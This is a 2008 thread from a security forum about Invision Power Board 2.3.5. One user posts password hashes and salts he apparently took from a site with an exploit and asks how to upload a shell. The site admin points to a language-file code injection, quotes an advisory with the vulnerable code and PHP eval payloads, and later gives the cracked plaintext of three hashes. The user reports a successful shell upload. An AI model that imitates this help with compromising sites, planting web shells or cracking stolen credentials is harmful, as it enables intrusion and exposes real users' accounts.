Login or Register :: Home :: Search :: Your Account :: Forums :: Waraxe Advisories :: Tools :: July 27, 2024 Menu Home Logout Discussions Forums Members List IRC chat Tools Base64 coder MD5 hash CRC32 checksum ROT13 coder SHA-1 hash URL-decoder Sql Char Encoder Affiliates y3dips ITsec Md5 Cracker User Manuals AlbumNow Content Content Sections FAQ Top Info Feedback Recommend Us Search Journal Your Account User Info Welcome, Anonymous Nickname Password (Register) Membership: Latest: MichaelSnaRe New Today: 0 New Yesterday: 0 Overall: 9144 People Online: Visitors: 218 Members: 0 Total: 218 Full disclosure CyberDanube Security Research 20240722-0 | Multiple Vulnerabilities in Perten/PerkinElmer ProcessPlus [KIS-2024-06] XenForo <= 2.2.15 (Template System) Remote Code Execution Vulnerability [KIS-2024-05] XenForo <= 2.2.15 (Widget::actionSave) Cross-Site Request Forgery Vulnerability CVE-2024-33326 CVE-2024-33327 CVE-2024-33328 CVE-2024-33329 CyberDanube Security Research 20240703-0 | Authenticated Command Injection in Helmholz Industrial Router REX100 SEC Consult SA-20240627-0 :: Local Privilege Escalation via MSI installer in SoftMaker Office / FreeOffice SEC Consult SA-20240626-0 :: Multiple Vulnerabilities in Siemens Power Automation Products Novel DoS Vulnerability Affecting WebRTC Media Servers APPLE-SA-06-25-2024-1 AirPods Firmware Update 6A326, AirPods Firmware Update 6F8, and Beats Firmware Update 6F8 40 vulnerabilities in Toshiba Multi-Function Printers 17 vulnerabilities in Sharp Multi-Function Printers SEC Consult SA-20240624-0 :: Multiple Vulnerabilities allowing complete bypass in Faronics WINSelect (Standard + Enterprise) IT Security and Insecurity Portal www.waraxe.us Forum Index -> All other hashes -> some questions on ipb View previous topic :: View next topic some questions on ipb Posted: Tue Sep 23, 2008 4:59 pm king424 Regular user Joined: Apr 03, 2008 Posts: 24 first:i use ipb2.3.5 exp got some hash,but cann't crack them~ Hash: 4d86409a2fd8dffc4e60c915f83fde77 Salt: c~cfN Hash: 5a76d0a32d9e713d3f86fef9de08ed10 Salt: 2bzLS Hash: 6611271cb4fef84dee04fac706bba8bf Salt: G?dvO Hash: 2482566d9798bd8b66fb7d6ca343e0d1 Salt: ;"u?? Hash: 6afebdbc3da0e5fe025c8c80190d6acf Salt: ]}5td Hash: b5aa5095177b1fe1d7aba35ddf7c238e Salt: $QmZ; Hash: 4d1c98ad4b31e1518d0c9036d1922b41 Salt: |3|uE Hash: 8813d3647b5e23815d80f659ce9a1886 Salt: YgiMC Hash: 69d047edafb621fc1024366a39a26f01 Salt: &tg0~ Hash: f3df6fde904cfd2905099dba3dfb5a33 Salt: .Qpc} Hash: 3389e60cf59abffec47f28f42d87d7cd Salt: lq30x Hash: 06e5fdb9d0b1378cc5b863d3abcb29be Salt: L/(1V Hash: 0c0a9aba4d194b3b3ddd6458673b7bbe Salt: hM!v% Hash: 0554c34fc91fd76785e2713f7cfa22c1 Salt: +`{+u Hash: ea2c88dc1dd3ad67738e72c90677a1c9 Salt: D{|a? Hash: 6c8bc609808a88090bb90d7e5ea07620 Salt: hA80] Hash: f5523704af4d3a00c2d7fe59cdc345be Salt: Rv/3W Hash: 25ffb0cc85ac580f59112fe3ef76ec31 Salt: v|{|= Hash: e42bde777cffec3766c4e387cd69406b Salt: PkyRo Hash: 44352b5a1741ec1c382f0aa77f7cdb8e Salt: 8f+n) Hash: 9a5cc5f20a4d7a61ec25c83e7fa827a5 Salt: meshI Hash: f2b932b4f7550f3d4ad527abb7ab43b6 Salt: AAo.) The second:ipb2.3.5 how to upload shell? thanks for you help! Posted: Tue Sep 23, 2008 8:45 pm waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu Admin CP --> language management. This will let you manipulate language files and inject your own php code. For details look at Darkfig's advisory http://acid-root.new.fr/?0:18 Posted: Wed Sep 24, 2008 6:05 am king424 Regular user Joined: Apr 03, 2008 Posts: 24 waraxe wrote: Admin CP --> language management. This will let you manipulate language files and inject your own php code. For details look at Darkfig's advisory http://acid-root.new.fr/?0:18 thanks for waraxe.i upload shell Successfull~~ but these hash cracked failure Posted: Wed Sep 24, 2008 7:55 am martin1 Regular user Joined: Sep 21, 2008 Posts: 17 any chance one of you's can gimme some advice with this. As the link you supplied dont work Posted: Wed Sep 24, 2008 8:53 am waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu martin1 wrote: any chance one of you's can gimme some advice with this. As the link you supplied dont work http://acid-root.new.fr/?0:18 Code: Title: Invision Power Board <= 2.3.5 Multiple Vulnerabilities and Security Bypass Vendor: http://www.invisionpower.com/community/board/ Advisory: http://acid-root.new.fr/?0:18 Author: DarkFig < gmdarkfig (at) gmail (dot) com > Released on: 2008/08/29 Changelog: 2008/08/30 Summary: Introduction Blind SQL Injection Insecure SQL Password Usage Admin Session Hijacking Deep Recursion Protection Bypass Code Execution Miscellanious Risk level: Medium / High ... ... VI - CODE EXECUTION The ACP allows admins to manage languages, they can choose the default language, import a new one, and edit them. Let's take a look in the file "sources/action_admin/ languages.php": 65| switch($this->ipsclass->input['code']) 66| { ..| 88| case 'doedit': 89| $this->ipsclass->admin->cp_permission_check(...); 90| $this->save_langfile(); 110| break; ...| 935| function save_langfile() 936| { ...| 957| $lang_file = CACHE_PATH."cache/lang_cache/".$row['ldir']. ...| "/".$this->ipsclass->input['lang_file']; 958| 959| if (! file_exists( $lang_file ) ) ... ...| 963| 964| if (! is_writeable( $lang_file ) ) ... ...| 969| $barney = array(); 970| 971| foreach ($this->ipsclass->input as $k => $v) 972| { 973| if ( preg_match( "/^XX_(\S+)$/", $k, $match ) ) 974| { 975| if ( isset($this->ipsclass->input[ $match[0] ]) ) 976| { 977| $v = str_replace("'", "'", stripslashes($_POST[$match[0]])); 978| $v = str_replace("<", "<", $v ); 979| $v = str_replace(">", ">", $v ); 980| $v = str_replace("&", "&", $v ); 981| $v = str_replace("\r", "", $v ); 982| 983| $barney[ $match[1] ] = $v; 984| } 985| } 986| } As you can see, there's several replacements which are made. Some HTML entities are converted to their applicable characters. The "stripslashes()" function is also called. But we don't really care about that, this will not cause a problem, this was just to show you how user's inputs are treated. Now let's see how the change is made: 993| $start = "<?php\n\n".'$lang = array('."\n"; 994| 995| foreach($barney as $key => $text) 996| { 997| $text = preg_replace("/\n{1,}$/", "", $text); 998| $start .= "\n'".$key."' => \"".str_replace( '"', '\"', $text)."\","; 999| } 1000| 1001| $start .= "\n\n);\n\n?".">"; 1002| 1003| if ($fh = fopen( $lang_file, 'w') ) 1004| { 1005| fwrite($fh, $start ); 1006| fclose($fh); 1007| } So, there's a protection against double quotes, not all escape characters. There are several ways to bypass this protection. The first method, is to play with what we call "dynamic variables". With two $, we can execute PHP code. Example: ${${@eval($_SERVER[HTTP_SH])}} The second one, is to use another escape character, a backslash (\) will do the stuff. The attacker must change two inputs. Example: First input: hello\ Second input: ); @eval($_SERVER[HTTP_SH]); /* Posted: Wed Sep 24, 2008 10:23 am martin1 Regular user Joined: Sep 21, 2008 Posts: 17 Thanks waraxe Posted: Wed Sep 24, 2008 12:32 pm waraxe Site admin Joined: May 11, 2004 Posts: 2407 Location: Estonia, Tartu Plaintext of 4d1c98ad4b31e1518d0c9036d1922b41 is forever Plaintext of 44352b5a1741ec1c382f0aa77f7cdb8e is mugello Plaintext of 06e5fdb9d0b1378cc5b863d3abcb29be is brabak Posted: Thu Sep 25, 2008 5:36 am king424 Regular user Joined: Apr 03, 2008 Posts: 24 thanks again! anyone can crack any others? Posted: Fri Sep 26, 2008 7:08 am donkey Regular user Joined: Sep 26, 2008 Posts: 11 how did u get the salt of that thing ? some questions on ipb www.waraxe.us Forum Index -> All other hashes You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum All times are GMT Page 1 of 1 All Posts1 Day7 Days2 Weeks1 Month3 Months6 Months1 YearOldest FirstNewest First Select a forumSecurity Research by waraxe----------------General discussionHow to fixMetasploit relatedHash cracking requests----------------MD5 hashesAll other hashesHash related informationhttp://www.waraxe.us portal----------------SuggestionsCooperation proposalsSecurity bugs and issues in general----------------Newbies cornerSql injectionCross-site scripting aka XSSRemote file inclusionFull path disclosureShell commands injectionPhishing and Social EngineeringAll other security holesVarious software----------------PhpNukePostNukePhpBBXMB forumvBulletin BoardInvision Power Boarde107MamboJoomlaXOOPSM$ WindowsLinux worldAll other softwareCoppermine Photo GalleryProgramming languages----------------PhpMySqlPerlJavaJavascriptC and C++Visual BasicBorland Delphi and PascalPythonHTML and XMLAssemblerReverse engineering----------------Newbies cornerDisassemblingPHP script decode requestsMiscellaneous stuff----------------Future of the ITNanotechnologyFun cornerLinksTry2hack sitesProxy databaseDirect Downloads----------------ToolsTutorialsWordlistsRecycle Bin----------------Removed messagesOutdated posts Powered by phpBB © 2001-2008 phpBB Group

Space Raider game for Android, free download - Space Raider gameplay video - Zone Raider mobile games
All logos and trademarks in this site are property of their respective owner. The comments and posts are property of their posters, all the rest (c) 2004-2024 Janek Vind "waraxe"
Page Generation: 0.097 Seconds